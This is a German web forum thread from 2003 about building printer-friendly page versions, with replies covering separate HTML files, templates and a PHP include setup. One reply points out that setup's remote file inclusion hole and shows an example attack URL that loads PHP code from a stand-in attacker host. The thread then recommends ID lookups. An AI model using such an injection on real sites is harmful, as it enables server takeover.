Druckversionen

Dieses Thema Druckversionen im Forum "Webentwicklung, Hosting & Programmierung" wurde erstellt von KleinerDrache, 24. Juli 2003.

Thema: Druckversionen Hallo, man findet auf diversen Seiten ja immer nette Texte und unter den Texten steht dann immer ein Link...

  1. Hallo,

    man findet auf diversen Seiten ja immer nette Texte und unter den Texten steht dann immer ein Link Druckversion. Wenn man dort drauf klickt dann erhält man den Text ohne Hintergrund und ohne irgendwelche Schnörkeleien um ihn gut ausdrucken zu können.
    Ich möchte soetwas auch anbieten. Kann mir jemadn sagen wie man das macht??

    Wäre echt dankbar dafür....
     
  2. Hallo KleinerDrache,

    Ich weiß zwar nicht, ob es dafür ein JavaScript o.ä. gibt, aber du könntest ja eine extra HTML-Datei für die Druckversion erstellen.

    Beispielsweise Grafiken, die du in der Druckversion nicht unbedingt benötigst, könntest du weglassen. Die Schriftart ggf. in Times New Roman oder in eine andere Serifenschrift umändern.

    .. Sahne


    EDIT:

    Ich habe ein JavaScript mit Hilfe von Google gefunden...

    http://pc-anfaenger.de/script/jsdruck.htm

    http://pc-anfaenger.de/script/jsdruck1.htm
     
  3. Hi

    Meistens wird dabei ein Template System verwendet, dass heißt du hast ein Design zum angucken und eins zum ausdrucken. Und je nach dem wie man die Parameter übergibt wird dann halt eins davon angezeigt.
    Dazu brauchst du dann aber Scriptsprachen wie PHP, Perl, ASP.

    Gruß, Michael
     
  4. Hi,

    danke erstmal für die Hilfe aber ich habe das jetzt ganz einfach gelöst. Hab einfach noch ne htm Datei mit dem selben Text erstellt aber ohne irgendwelchen Hintergrund oder Schnörkel.
    Hab dann nen Link auf die normale Seite gesetzt und wenn man den Klickt dann öffnet sich die Druckversion und man kann die vom Browser aus ausdrucken...
     
  5. Bei meiner seite (mit PHP) läuft das so ab:

    ich lade immer die datei index.php und übergebe der einen Wert link=xyz.
    Aus diesem Wert (also xyz) wird die entsprechende Seite gesucht, die dann xyz.php heissen müsste. Die index.php includiert aber nicht nur die xyz, sondern auch 2 weitere php-Dateien, die die beiden Spalten repräsentieren, die links und rechts von XYZ stehen.
    Für die Druckversion hab ich eine weitere php-datei print.php gschrieben, die aber NUR die xyz includiert und sich auch auf ein anderes CSS Stylesheet bezieht. in diesem anderen CSS sind dann natürlich alle Layout-Variablen einfach gehalten, also mit schwarzer Schrift auf weisser Hintergrundfarbe.
    Kannst du dir ja mal anschauen.
    www.himmel-un-aed.com/index.php?link=priwall
    (der Link zur Druckversion befindet sich ganz unten)

    Wenn du daran interessiert bist, kannst du mir ne Kurzmitteilung schicken und ich schick dir den Quellcode der PHP datei(en).
     
  6. Hi

    Das ist aber eine Sicherheitslücke.
    Du hast glück das du include immer nur mit dem Unterverzeichnis Artikel aufrufst, sonst hätte ich gleich mal ein Exploit gemacht :)

    Weil was hindert dich sonst daran die url zu ändern:
    index.php?link=http://ichbinboese.de/exploit

    Dann wird mein eigener PHP Code includet und ausgeführt.
    Damit baut man sich einen kleinen Fileuploader und schon kann man machen was man will 8)

    Gruß, Michael
     
  7. danke für den tipp...
    Aber, was kann man dagegen machen? Das sollte ja hoffentlich nicht bedeuten, dass die includes generell diese Sicheheitslücke mit sich bringen.
     
  8. Hi

    Das Problem ist ja nicht das include, sondern die ungeprüfte Variable :)
    Die meisten seiten machen es so, dass sie nur eine ID der Seite übergeben, die dann in einer Datenbank o.ä. nachgeschlagen wird und wenn es einen Treffer gibt dann den Pfad zur Datei zurückgibt.
    So schließt man aus das man auf Dateien zugreifen kann die dort nicht eingetragen sind.

    Gruß, Michael
     
  9. Gute Idee das... Werde ich in den nächsten Tagen dann auch so machen.
    4 und mehr Augen sehen eben mehr als 2.

    Dank je well...